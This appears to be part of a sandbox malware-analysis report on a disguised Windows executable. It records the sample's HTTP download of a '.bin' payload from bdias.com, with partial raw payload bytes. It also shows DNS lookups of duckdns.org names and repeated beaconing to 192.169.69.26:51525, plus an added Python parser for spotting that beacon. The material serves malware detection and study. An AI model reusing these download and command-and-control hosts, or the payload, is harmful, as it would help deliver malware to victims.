                                      Nov 13, 2024 08:19:46.023222923 CET5152550033192.169.69.26192.168.2.4
                                      Nov 13, 2024 08:19:46.023297071 CET5003351525192.168.2.4192.169.69.26
                                      Nov 13, 2024 08:19:46.027430058 CET5003351525192.168.2.4192.169.69.26
                                      Nov 13, 2024 08:19:46.032202959 CET5152550033192.169.69.26192.168.2.4
                                      Nov 13, 2024 08:19:46.795068026 CET5152550033192.169.69.26192.168.2.4
                                      Nov 13, 2024 08:19:46.795133114 CET5003351525192.168.2.4192.169.69.26
                                      Nov 13, 2024 08:19:46.795829058 CET5003351525192.168.2.4192.169.69.26
                                      Nov 13, 2024 08:19:46.800673962 CET5152550033192.169.69.26192.168.2.4
                                      Nov 13, 2024 08:19:47.812671900 CET5004351525192.168.2.4192.169.69.26
                                      Nov 13, 2024 08:19:47.817536116 CET5152550043192.169.69.26192.168.2.4
                                      Nov 13, 2024 08:19:47.817672968 CET5004351525192.168.2.4192.169.69.26
                                      Nov 13, 2024 08:19:47.823703051 CET5004351525192.168.2.4192.169.69.26
                                      Nov 13, 2024 08:19:47.828505993 CET5152550043192.169.69.26192.168.2.4
                                      Nov 13, 2024 08:19:48.651516914 CET5152550043192.169.69.26192.168.2.4
                                      Nov 13, 2024 08:19:48.651599884 CET5004351525192.168.2.4192.169.69.26
                                      Nov 13, 2024 08:19:48.652323961 CET5004351525192.168.2.4192.169.69.26
                                      Nov 13, 2024 08:19:48.653937101 CET5004451525192.168.2.4192.169.69.26
                                      Nov 13, 2024 08:19:48.657195091 CET5152550043192.169.69.26192.168.2.4
                                      Nov 13, 2024 08:19:48.658798933 CET5152550044192.169.69.26192.168.2.4
                                      Nov 13, 2024 08:19:48.658878088 CET5004451525192.168.2.4192.169.69.26
                                      Nov 13, 2024 08:19:48.660481930 CET5004451525192.168.2.4192.169.69.26
                                      Nov 13, 2024 08:19:48.665431976 CET5152550044192.169.69.26192.168.2.4
                                      Nov 13, 2024 08:19:49.458468914 CET5152550044192.169.69.26192.168.2.4
                                      Nov 13, 2024 08:19:49.458549976 CET5004451525192.168.2.4192.169.69.26
                                      Nov 13, 2024 08:19:49.458770037 CET5004451525192.168.2.4192.169.69.26
                                      Nov 13, 2024 08:19:49.460354090 CET5004551525192.168.2.4192.169.69.26
                                      Nov 13, 2024 08:19:49.463502884 CET5152550044192.169.69.26192.168.2.4
                                      Nov 13, 2024 08:19:49.465229988 CET5152550045192.169.69.26192.168.2.4
                                      Nov 13, 2024 08:19:49.465303898 CET5004551525192.168.2.4192.169.69.26
                                      Nov 13, 2024 08:19:49.469938993 CET5004551525192.168.2.4192.169.69.26
                                      Nov 13, 2024 08:19:49.474788904 CET5152550045192.169.69.26192.168.2.4
                                      Nov 13, 2024 08:19:50.222414017 CET5152550045192.169.69.26192.168.2.4
                                      Nov 13, 2024 08:19:50.222482920 CET5004551525192.168.2.4192.169.69.26
                                      Nov 13, 2024 08:19:50.223125935 CET5004551525192.168.2.4192.169.69.26
                                      Nov 13, 2024 08:19:50.227948904 CET5152550045192.169.69.26192.168.2.4
                                      Nov 13, 2024 08:19:51.234636068 CET5004651525192.168.2.4192.169.69.26
                                      Nov 13, 2024 08:19:51.239803076 CET5152550046192.169.69.26192.168.2.4
                                      Nov 13, 2024 08:19:51.239870071 CET5004651525192.168.2.4192.169.69.26
                                      Nov 13, 2024 08:19:51.243928909 CET5004651525192.168.2.4192.169.69.26
                                      Nov 13, 2024 08:19:51.248933077 CET5152550046192.169.69.26192.168.2.4
                                      Nov 13, 2024 08:19:52.106578112 CET5152550046192.169.69.26192.168.2.4
                                      Nov 13, 2024 08:19:52.106671095 CET5004651525192.168.2.4192.169.69.26
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Nov 13, 2024 08:19:52.107327938 CET | 50046 | 51525 | 192.168.2.4 | 192.169.69.26
Nov 13, 2024 08:19:52.109575033 CET | 50047 | 51525 | 192.168.2.4 | 192.169.69.26
Nov 13, 2024 08:19:52.112098932 CET | 51525 | 50046 | 192.169.69.26 | 192.168.2.4
Nov 13, 2024 08:19:52.114650011 CET | 51525 | 50047 | 192.169.69.26 | 192.168.2.4
Nov 13, 2024 08:19:52.114717960 CET | 50047 | 51525 | 192.168.2.4 | 192.169.69.26
Nov 13, 2024 08:19:52.115381956 CET | 50047 | 51525 | 192.168.2.4 | 192.169.69.26
Nov 13, 2024 08:19:52.120157957 CET | 51525 | 50047 | 192.169.69.26 | 192.168.2.4
Nov 13, 2024 08:19:52.892479897 CET | 51525 | 50047 | 192.169.69.26 | 192.168.2.4
Nov 13, 2024 08:19:52.892580032 CET | 50047 | 51525 | 192.168.2.4 | 192.169.69.26
Nov 13, 2024 08:19:52.892788887 CET | 50047 | 51525 | 192.168.2.4 | 192.169.69.26
Nov 13, 2024 08:19:52.895400047 CET | 50048 | 51525 | 192.168.2.4 | 192.169.69.26
Nov 13, 2024 08:19:52.897561073 CET | 51525 | 50047 | 192.169.69.26 | 192.168.2.4
Nov 13, 2024 08:19:52.900402069 CET | 51525 | 50048 | 192.169.69.26 | 192.168.2.4
Nov 13, 2024 08:19:52.900476933 CET | 50048 | 51525 | 192.168.2.4 | 192.169.69.26
Nov 13, 2024 08:19:52.904702902 CET | 50048 | 51525 | 192.168.2.4 | 192.169.69.26
Nov 13, 2024 08:19:52.909554958 CET | 51525 | 50048 | 192.169.69.26 | 192.168.2.4
Nov 13, 2024 08:19:53.685035944 CET | 51525 | 50048 | 192.169.69.26 | 192.168.2.4
Nov 13, 2024 08:19:53.685122013 CET | 50048 | 51525 | 192.168.2.4 | 192.169.69.26
Nov 13, 2024 08:19:53.686156034 CET | 50048 | 51525 | 192.168.2.4 | 192.169.69.26
Nov 13, 2024 08:19:53.691049099 CET | 51525 | 50048 | 192.169.69.26 | 192.168.2.4
Nov 13, 2024 08:19:54.703223944 CET | 50049 | 51525 | 192.168.2.4 | 192.169.69.26
Nov 13, 2024 08:19:54.708172083 CET | 51525 | 50049 | 192.169.69.26 | 192.168.2.4
Nov 13, 2024 08:19:54.708256960 CET | 50049 | 51525 | 192.168.2.4 | 192.169.69.26
Nov 13, 2024 08:19:54.712259054 CET | 50049 | 51525 | 192.168.2.4 | 192.169.69.26
Nov 13, 2024 08:19:54.717078924 CET | 51525 | 50049 | 192.169.69.26 | 192.168.2.4
Nov 13, 2024 08:19:55.544234991 CET | 51525 | 50049 | 192.169.69.26 | 192.168.2.4
Nov 13, 2024 08:19:55.544308901 CET | 50049 | 51525 | 192.168.2.4 | 192.169.69.26
Nov 13, 2024 08:19:55.544972897 CET | 50049 | 51525 | 192.168.2.4 | 192.169.69.26
Nov 13, 2024 08:19:55.546436071 CET | 50050 | 51525 | 192.168.2.4 | 192.169.69.26
Nov 13, 2024 08:19:55.549763918 CET | 51525 | 50049 | 192.169.69.26 | 192.168.2.4
Nov 13, 2024 08:19:55.551253080 CET | 51525 | 50050 | 192.169.69.26 | 192.168.2.4
Nov 13, 2024 08:19:55.551311016 CET | 50050 | 51525 | 192.168.2.4 | 192.169.69.26
Nov 13, 2024 08:19:55.552303076 CET | 50050 | 51525 | 192.168.2.4 | 192.169.69.26
Nov 13, 2024 08:19:55.557092905 CET | 51525 | 50050 | 192.169.69.26 | 192.168.2.4
Nov 13, 2024 08:19:56.411914110 CET | 51525 | 50050 | 192.169.69.26 | 192.168.2.4
Nov 13, 2024 08:19:56.412044048 CET | 50050 | 51525 | 192.168.2.4 | 192.169.69.26
Nov 13, 2024 08:19:56.415673018 CET | 50050 | 51525 | 192.168.2.4 | 192.169.69.26
Nov 13, 2024 08:19:56.420526981 CET | 51525 | 50050 | 192.169.69.26 | 192.168.2.4
Nov 13, 2024 08:19:56.427717924 CET | 50051 | 51525 | 192.168.2.4 | 192.169.69.26
Nov 13, 2024 08:19:56.432526112 CET | 51525 | 50051 | 192.169.69.26 | 192.168.2.4
Nov 13, 2024 08:19:56.432590961 CET | 50051 | 51525 | 192.168.2.4 | 192.169.69.26
Nov 13, 2024 08:19:56.463922024 CET | 50051 | 51525 | 192.168.2.4 | 192.169.69.26
Nov 13, 2024 08:19:56.468751907 CET | 51525 | 50051 | 192.169.69.26 | 192.168.2.4
Nov 13, 2024 08:19:57.283866882 CET | 51525 | 50051 | 192.169.69.26 | 192.168.2.4
Nov 13, 2024 08:19:57.283982992 CET | 50051 | 51525 | 192.168.2.4 | 192.169.69.26
Nov 13, 2024 08:19:57.284677029 CET | 50051 | 51525 | 192.168.2.4 | 192.169.69.26
Nov 13, 2024 08:19:57.289432049 CET | 51525 | 50051 | 192.169.69.26 | 192.168.2.4
Nov 13, 2024 08:19:58.297084093 CET | 50052 | 51525 | 192.168.2.4 | 192.169.69.26
Nov 13, 2024 08:19:58.302032948 CET | 51525 | 50052 | 192.169.69.26 | 192.168.2.4
Nov 13, 2024 08:19:58.302114964 CET | 50052 | 51525 | 192.168.2.4 | 192.169.69.26
Nov 13, 2024 08:19:58.306497097 CET | 50052 | 51525 | 192.168.2.4 | 192.169.69.26
Nov 13, 2024 08:19:58.311342955 CET | 51525 | 50052 | 192.169.69.26 | 192.168.2.4
Nov 13, 2024 08:19:59.104764938 CET | 51525 | 50052 | 192.169.69.26 | 192.168.2.4
Nov 13, 2024 08:19:59.104861021 CET | 50052 | 51525 | 192.168.2.4 | 192.169.69.26
Nov 13, 2024 08:19:59.105374098 CET | 50052 | 51525 | 192.168.2.4 | 192.169.69.26
Nov 13, 2024 08:19:59.106580973 CET | 50053 | 51525 | 192.168.2.4 | 192.169.69.26
Nov 13, 2024 08:19:59.110131025 CET | 51525 | 50052 | 192.169.69.26 | 192.168.2.4
Nov 13, 2024 08:19:59.111399889 CET | 51525 | 50053 | 192.169.69.26 | 192.168.2.4
Nov 13, 2024 08:19:59.111498117 CET | 50053 | 51525 | 192.168.2.4 | 192.169.69.26
Nov 13, 2024 08:19:59.112616062 CET | 50053 | 51525 | 192.168.2.4 | 192.169.69.26
Nov 13, 2024 08:19:59.117405891 CET | 51525 | 50053 | 192.169.69.26 | 192.168.2.4
Nov 13, 2024 08:19:59.975121975 CET | 51525 | 50053 | 192.169.69.26 | 192.168.2.4
Nov 13, 2024 08:19:59.975182056 CET | 50053 | 51525 | 192.168.2.4 | 192.169.69.26
Nov 13, 2024 08:19:59.975409031 CET | 50053 | 51525 | 192.168.2.4 | 192.169.69.26
Nov 13, 2024 08:19:59.976876020 CET | 50054 | 51525 | 192.168.2.4 | 192.169.69.26
Nov 13, 2024 08:19:59.980122089 CET | 51525 | 50053 | 192.169.69.26 | 192.168.2.4
Nov 13, 2024 08:19:59.981659889 CET | 51525 | 50054 | 192.169.69.26 | 192.168.2.4
Nov 13, 2024 08:19:59.981725931 CET | 50054 | 51525 | 192.168.2.4 | 192.169.69.26
Nov 13, 2024 08:19:59.986318111 CET | 50054 | 51525 | 192.168.2.4 | 192.169.69.26
Nov 13, 2024 08:19:59.991147041 CET | 51525 | 50054 | 192.169.69.26 | 192.168.2.4
Nov 13, 2024 08:20:00.760504961 CET | 51525 | 50054 | 192.169.69.26 | 192.168.2.4
Nov 13, 2024 08:20:00.760643959 CET | 50054 | 51525 | 192.168.2.4 | 192.169.69.26
Nov 13, 2024 08:20:00.762800932 CET | 50054 | 51525 | 192.168.2.4 | 192.169.69.26
Nov 13, 2024 08:20:00.767555952 CET | 51525 | 50054 | 192.169.69.26 | 192.168.2.4
Nov 13, 2024 08:20:01.778745890 CET | 50055 | 51525 | 192.168.2.4 | 192.169.69.26
Nov 13, 2024 08:20:01.783592939 CET | 51525 | 50055 | 192.169.69.26 | 192.168.2.4
Nov 13, 2024 08:20:01.783670902 CET | 50055 | 51525 | 192.168.2.4 | 192.169.69.26
Nov 13, 2024 08:20:01.794661999 CET | 50055 | 51525 | 192.168.2.4 | 192.169.69.26
Nov 13, 2024 08:20:01.799452066 CET | 51525 | 50055 | 192.169.69.26 | 192.168.2.4
Nov 13, 2024 08:20:02.576226950 CET | 51525 | 50055 | 192.169.69.26 | 192.168.2.4
Nov 13, 2024 08:20:02.576298952 CET | 50055 | 51525 | 192.168.2.4 | 192.169.69.26
Nov 13, 2024 08:20:04.683968067 CET | 50055 | 51525 | 192.168.2.4 | 192.169.69.26
Nov 13, 2024 08:20:04.688730001 CET | 51525 | 50055 | 192.169.69.26 | 192.168.2.4
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Nov 13, 2024 08:18:53.020380020 CET | 54827 | 53 | 192.168.2.4 | 1.1.1.1
Nov 13, 2024 08:18:53.105350018 CET | 53 | 54827 | 1.1.1.1 | 192.168.2.4
Nov 13, 2024 08:18:59.406265020 CET | 64341 | 53 | 192.168.2.4 | 1.1.1.1
Nov 13, 2024 08:19:00.404405117 CET | 64341 | 53 | 192.168.2.4 | 1.1.1.1
Nov 13, 2024 08:19:01.404428005 CET | 64341 | 53 | 192.168.2.4 | 1.1.1.1
Nov 13, 2024 08:19:02.418731928 CET | 53 | 64341 | 1.1.1.1 | 192.168.2.4
Nov 13, 2024 08:19:02.418745995 CET | 53 | 64341 | 1.1.1.1 | 192.168.2.4
Nov 13, 2024 08:19:02.418760061 CET | 53 | 64341 | 1.1.1.1 | 192.168.2.4
Nov 13, 2024 08:19:03.197638035 CET | 49553 | 53 | 192.168.2.4 | 1.1.1.1
Nov 13, 2024 08:19:03.299628019 CET | 53 | 49553 | 1.1.1.1 | 192.168.2.4
Nov 13, 2024 08:19:04.050910950 CET | 51893 | 53 | 192.168.2.4 | 1.1.1.1
Nov 13, 2024 08:19:04.157780886 CET | 53 | 51893 | 1.1.1.1 | 192.168.2.4
Nov 13, 2024 08:20:04.685276985 CET | 49156 | 53 | 192.168.2.4 | 1.1.1.1
Nov 13, 2024 08:20:05.670250893 CET | 49156 | 53 | 192.168.2.4 | 1.1.1.1
Nov 13, 2024 08:20:06.300339937 CET | 53 | 49156 | 1.1.1.1 | 192.168.2.4
Nov 13, 2024 08:20:06.300354958 CET | 53 | 49156 | 1.1.1.1 | 192.168.2.4
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Nov 13, 2024 08:18:53.020380020 CET | 192.168.2.4 | 1.1.1.1 | 0x9682 | Standard query (0) | bdias.com | A (IP address) | IN (0x0001) | false
Nov 13, 2024 08:18:59.406265020 CET | 192.168.2.4 | 1.1.1.1 | 0x3485 | Standard query (0) | odumegwu.duckdns.org | A (IP address) | IN (0x0001) | false
Nov 13, 2024 08:19:00.404405117 CET | 192.168.2.4 | 1.1.1.1 | 0x3485 | Standard query (0) | odumegwu.duckdns.org | A (IP address) | IN (0x0001) | false
Nov 13, 2024 08:19:01.404428005 CET | 192.168.2.4 | 1.1.1.1 | 0x3485 | Standard query (0) | odumegwu.duckdns.org | A (IP address) | IN (0x0001) | false
Nov 13, 2024 08:19:03.197638035 CET | 192.168.2.4 | 1.1.1.1 | 0x77a1 | Standard query (0) | odumeje1.duckdns.org | A (IP address) | IN (0x0001) | false
Nov 13, 2024 08:19:04.050910950 CET | 192.168.2.4 | 1.1.1.1 | 0x1ba1 | Standard query (0) | odumeje.duckdns.org | A (IP address) | IN (0x0001) | false
Nov 13, 2024 08:20:04.685276985 CET | 192.168.2.4 | 1.1.1.1 | 0x6982 | Standard query (0) | odumeje1.duckdns.org | A (IP address) | IN (0x0001) | false
Nov 13, 2024 08:20:05.670250893 CET | 192.168.2.4 | 1.1.1.1 | 0x6982 | Standard query (0) | odumeje1.duckdns.org | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Nov 13, 2024 08:18:53.105350018 CET | 1.1.1.1 | 192.168.2.4 | 0x9682 | No error (0) | bdias.com | - | 91.196.125.125 | A (IP address) | IN (0x0001) | false
Nov 13, 2024 08:19:02.418731928 CET | 1.1.1.1 | 192.168.2.4 | 0x3485 | No error (0) | odumegwu.duckdns.org | - | 192.169.69.26 | A (IP address) | IN (0x0001) | false
Nov 13, 2024 08:19:02.418745995 CET | 1.1.1.1 | 192.168.2.4 | 0x3485 | No error (0) | odumegwu.duckdns.org | - | 192.169.69.26 | A (IP address) | IN (0x0001) | false
Nov 13, 2024 08:19:02.418760061 CET | 1.1.1.1 | 192.168.2.4 | 0x3485 | No error (0) | odumegwu.duckdns.org | - | 192.169.69.26 | A (IP address) | IN (0x0001) | false
Nov 13, 2024 08:19:03.299628019 CET | 1.1.1.1 | 192.168.2.4 | 0x77a1 | No error (0) | odumeje1.duckdns.org | - | 192.169.69.26 | A (IP address) | IN (0x0001) | false
Nov 13, 2024 08:19:04.157780886 CET | 1.1.1.1 | 192.168.2.4 | 0x1ba1 | No error (0) | odumeje.duckdns.org | - | 192.169.69.26 | A (IP address) | IN (0x0001) | false
Nov 13, 2024 08:20:06.300339937 CET | 1.1.1.1 | 192.168.2.4 | 0x6982 | No error (0) | odumeje1.duckdns.org | - | 192.169.69.26 | A (IP address) | IN (0x0001) | false
Nov 13, 2024 08:20:06.300354958 CET | 1.1.1.1 | 192.168.2.4 | 0x6982 | No error (0) | odumeje1.duckdns.org | - | 192.169.69.26 | A (IP address) | IN (0x0001) | false
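The packet and DNS tables above are flattened in this rendering: each row fuses timestamp, ports and addresses with no separator, so an automated parse is ambiguous (192.168.2.4 followed by 192.169.69.26 reads equally well as 192.168.2.41 followed by 92.169.69.26). The signal an analyst wants out of them is the cadence of fresh connections from incrementing ephemeral ports to 192.169.69.26:51525, and the three duckdns.org names that resolve to that address. The Python below is an added example, not part of the Joe Sandbox report: it enumerates every legal reading of a fused row, settles the ambiguity against hosts and ports already known from the report (the analysis VM 192.168.2.4 and the resolver 1.1.1.1), summarises connection count and inter-connection gap per destination, and ties the dynamic-DNS answers to the busiest destination. The embedded rows are a subset copied from the tables above; the function names, the known-hosts ranking and the duckdns.org suffix list are my own assumptions.

```python
import re
from collections import defaultdict, namedtuple
from datetime import datetime
from statistics import median

# Constructed sample: rows copied from the flattened packet tables on this page. The
# five columns (timestamp, src port, dst port, src IP, dst IP) are run together, so the
# parser below enumerates every legal split and ranks the readings against known hosts.
PACKET_ROWS = """
Nov 13, 2024 08:18:53.020380020 CET5482753192.168.2.41.1.1.1
Nov 13, 2024 08:18:53.105350018 CET53548271.1.1.1192.168.2.4
Nov 13, 2024 08:19:52.107327938 CET5004651525192.168.2.4192.169.69.26
Nov 13, 2024 08:19:52.112098932 CET5152550046192.169.69.26192.168.2.4
Nov 13, 2024 08:19:52.895400047 CET5004851525192.168.2.4192.169.69.26
Nov 13, 2024 08:19:54.703223944 CET5004951525192.168.2.4192.169.69.26
Nov 13, 2024 08:19:55.546436071 CET5005051525192.168.2.4192.169.69.26
Nov 13, 2024 08:19:56.427717924 CET5005151525192.168.2.4192.169.69.26
Nov 13, 2024 08:19:58.297084093 CET5005251525192.168.2.4192.169.69.26
Nov 13, 2024 08:19:59.106580973 CET5005351525192.168.2.4192.169.69.26
Nov 13, 2024 08:19:59.976876020 CET5005451525192.168.2.4192.169.69.26
Nov 13, 2024 08:20:01.778745890 CET5005551525192.168.2.4192.169.69.26
""".strip().splitlines()

# DNS answer rows from the same page; only the name and the answered address are used.
DNS_ANSWER_ROWS = """
Nov 13, 2024 08:18:53.105350018 CET1.1.1.1192.168.2.40x9682No error (0)bdias.com91.196.125.125A (IP address)IN (0x0001)false
Nov 13, 2024 08:19:02.418731928 CET1.1.1.1192.168.2.40x3485No error (0)odumegwu.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
Nov 13, 2024 08:19:03.299628019 CET1.1.1.1192.168.2.40x77a1No error (0)odumeje1.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
Nov 13, 2024 08:19:04.157780886 CET1.1.1.1192.168.2.40x1ba1No error (0)odumeje.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
""".strip().splitlines()

ROW_RE = re.compile(r"^(\w{3} \d{1,2}, \d{4} \d\d:\d\d:\d\d)\.(\d+) (?:CET|UTC)(\S+)$")
DNS_RE = re.compile(r"No error \(0\)([a-z0-9.-]+?\.[a-z]+)(\d{1,3}(?:\.\d{1,3}){3})A \(IP address\)")
KNOWN_PORTS = {53, 80, 443}
DYNDNS_SUFFIXES = ("duckdns.org",)  # assumed list of dynamic-DNS providers worth flagging
Packet = namedtuple("Packet", "ts src_port dst_port src_ip dst_ip")

def _ok(field, limit):
    """A legal decimal field: non-empty, no leading zero, value within limit."""
    return field != "" and (field == "0" or field[0] != "0") and int(field) <= limit

def candidates(fused):
    """Every (src_port, dst_port, src_ip, dst_ip) reading of a fused field string."""
    runs = fused.split(".")
    if len(runs) != 7 or not all(_ok(r, 255) for r in runs[1:3] + runs[4:7]):
        return []
    head, mid, out = runs[0], runs[3], []   # head = ports + first octet, mid = octet4 + octet1
    for a in range(1, 6):                   # digits in the source port
        for b in range(1, 6):               # digits in the destination port
            p1, p2, o1 = head[:a], head[a:a + b], head[a + b:]
            if not (_ok(p1, 65535) and _ok(p2, 65535) and _ok(o1, 255)):
                continue
            for k in range(1, len(mid)):    # where IP 1 ends and IP 2 begins
                o4, o5 = mid[:k], mid[k:]
                if _ok(o4, 255) and _ok(o5, 255):
                    out.append((int(p1), int(p2), ".".join([o1, runs[1], runs[2], o4]),
                                ".".join([o5, runs[4], runs[5], runs[6]])))
    return out

def parse_packet(line, known_ips):
    """Best reading of one fused row, or None when the top two readings tie."""
    m = ROW_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m.group(1), "%b %d, %Y %H:%M:%S").replace(microsecond=int(m.group(2)[:6]))
    ranked = sorted((sum(ip in known_ips for ip in c[2:]) + sum(p in KNOWN_PORTS for p in c[:2]), c)
                    for c in candidates(m.group(3)))
    if not ranked or (len(ranked) > 1 and ranked[-1][0] == ranked[-2][0]):
        return None
    return Packet(ts, *ranked[-1][1])

def beacon_summary(packets, client_ip):
    """Client-initiated connections per (dst_ip, dst_port) and the median gap between them."""
    first_seen = {}   # (src_port, dst_ip, dst_port) -> earliest packet, i.e. the connection start
    for p in packets:
        if p.src_ip == client_ip:
            key = (p.src_port, p.dst_ip, p.dst_port)
            first_seen[key] = min(first_seen.get(key, p.ts), p.ts)
    by_target = defaultdict(list)
    for (_, dst_ip, dst_port), ts in first_seen.items():
        by_target[(dst_ip, dst_port)].append(ts)
    summary = {}
    for target, stamps in by_target.items():
        stamps.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(stamps, stamps[1:])]
        summary[target] = {"connections": len(stamps), "median_gap_s": round(median(gaps), 3) if gaps else None}
    return summary

def dyndns_names_for(dns_rows, address):
    """Names in the DNS answer rows that resolved `address` through a dynamic-DNS provider."""
    names = set()
    for row in dns_rows:
        m = DNS_RE.search(row)
        if m and m.group(2) == address and m.group(1).endswith(DYNDNS_SUFFIXES):
            names.add(m.group(1))
    return sorted(names)

def analyse(rows=PACKET_ROWS, dns_rows=DNS_ANSWER_ROWS, client_ip="192.168.2.4", resolver="1.1.1.1"):
    packets = [p for p in (parse_packet(r, {client_ip, resolver}) for r in rows) if p]
    summary = beacon_summary(packets, client_ip)
    # The endpoint (other than the resolver) with the most fresh connections is the C2 candidate.
    target = max((t for t in summary if t[0] != resolver), key=lambda t: summary[t]["connections"])
    return {"parsed": len(packets), "target": target, **summary[target],
            "dyndns": dyndns_names_for(dns_rows, target[0])}
```

On the embedded rows `analyse()` reports nine client-initiated connections to 192.169.69.26:51525 with a median gap under a second, each from the next ephemeral port, and three duckdns.org names answering with that address. Without the known-hosts hint `parse_packet` refuses to pick between the two IP readings and returns None rather than guessing.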
                                      • bdias.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49736 | 91.196.125.125 | 80 | 1076 | C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exe
Timestamp | Bytes transferred | Direction | Data
Nov 13, 2024 08:18:53.120764017 CET | 169 | OUT | GET /zjMSeQNkb41.bin HTTP/1.1
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                      Host: bdias.com
                                      Cache-Control: no-cache
Nov 13, 2024 08:18:54.016949892 CET | 439 | IN | HTTP/1.1 301 Moved Permanently
                                      Date: Wed, 13 Nov 2024 07:18:53 GMT
                                      Server: Apache
                                      Location: https://bdias.com/zjMSeQNkb41.bin
                                      Content-Length: 241
                                      Content-Type: text/html; charset=iso-8859-1
                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 62 64 69 61 73 2e 63 6f 6d 2f 7a 6a 4d 53 65 51 4e 6b 62 34 31 2e 62 69 6e 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://bdias.com/zjMSeQNkb41.bin">here</a>.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49737 | 91.196.125.125 | 443 | 1076 | C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-13 07:18:55 UTC | 193 | OUT | GET /zjMSeQNkb41.bin HTTP/1.1
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                      Cache-Control: no-cache
                                      Host: bdias.com
                                      Connection: Keep-Alive
2024-11-13 07:18:55 UTC | 286 | IN | HTTP/1.1 200 OK
                                      Date: Wed, 13 Nov 2024 07:18:55 GMT
                                      Server: Apache
                                      Upgrade: h2,h2c
                                      Connection: Upgrade, close
                                      Last-Modified: Tue, 12 Nov 2024 11:10:05 GMT
                                      ETag: "bb407b4-78640-626b54264a89c"
                                      Accept-Ranges: bytes
                                      Content-Length: 493120
                                      Content-Type: application/octet-stream
2024-11-13 07:18:55 UTC | 7906 | IN | Data Raw: 9d 62 7b 63 9f ea 7f d5 06 90 9d 76 93 4d 82 ac e6 f3 50 b2 34 7b b0 ce 2b dd 4f ab bc 76 09 b8 8f f4 55 b6 66 96 a7 01 1c 29 fc 90 cf 13 00 a2 62 3f bb 43 91 6b 2b 75 95 f8 ef e9 f3 5f c1 59 ef f8 23 04 ae 69 fc 04 c0 a0 08 95 17 f4 1a 7d 47 38 f6 b2 37 5d b5 cc ff 4b 67 01 aa a2 d5 f2 c0 0d a9 e0 46 d2 af 31 be 26 7c e7 f3 38 ca cf 2d 20 f5 46 eb bf eb 66 74 6c 82 24 4c fd 7e 94 2f d8 18 ee 29 bc 1b 28 24 fa 6e e0 99 70 2e 0d 09 0a 5d ec bc 04 2b 6b 8c d8 9b 44 04 dc 40 f1 01 3f 28 72 d9 fd 06 d8 0d d6 60 d7 6d a1 ff b4 9c 41 0d 8a 35 e2 e8 6a da 76 03 68 b7 5b 78 c7 5d b2 dc f6 30 9c 1a f3 22 97 8f 45 e4 7d e7 4a 4e a1 94 2f 1d 9a 1f f0 bd 8d 92 8c 53 a0 a0 f7 55 10 79 d8 cb 18 a9 1b 1b 42 3c 45 64 a8 c3 33 0e 0f 6d 7c 94 a1 37 e2 1c ed 4f f3 cb 1f 1c
Data Ascii: b{cvMP4{+OvUf)b?Ck+u_Y#i}G87]KgF1&|8- Fftl$L~/)($np.]+kD@?(r`mA5jvh[x]0"E}JN/SUyB<Ed3m|7O
2024-11-13 07:18:55 UTC | 8000 | IN | Data Raw: 86 9f a4 14 8e 6f c2 4c 76 03 40 aa 48 25 b6 45 ef 72 f7 7e ab 5f 9d 56 85 29 f8 f7 45 b5 51 3e 95 2d 7b b3 bb a6 82 52 79 39 24 45 a4 22 95 d1 4a 61 cd 01 ce 87 c2 ee 65 9d 68 f8 8d 1b fa 09 32 08 d4 54 90 5c 14 f2 b3 9b c2 0d 2e d5 6d 93 28 d7 46 ee f2 bc 99 8b bc 37 eb bb 04 9a d5 0f 53 ed 2a f3 15 c8 4a 5e ea b3 3b e9 87 32 43 84 a9 2b bf b9 e3 fa b9 19 88 77 40 49 f8 55 29 01 d4 d9 ca 83 17 37 9d f8 23 83 62 0b 39 8c 12 82 d6 77 76 78 b2 90 57 93 68 c8 56 8d d7 88 d6 3f 59 c6 a3 44 ec 3e 3a b1 de 64 d1 8f 7d 3f f8 c0 db 95 81 af 70 9d c5 b9 57 ac 31 a8 2a 12 e1 6b 7b 34 ae d2 5c f9 b3 85 43 32 95 5b 05 fe 0e 70 22 2c 23 59 3a e6 35 8f 13 57 95 ca bb 81 95 67 f7 61 0c 0c 4e a3 ab 75 41 6d cd 42 b2 81 89 27 94 fd 16 30 e0 4e 91 e2 59 b0 6f 57 74 b0 98
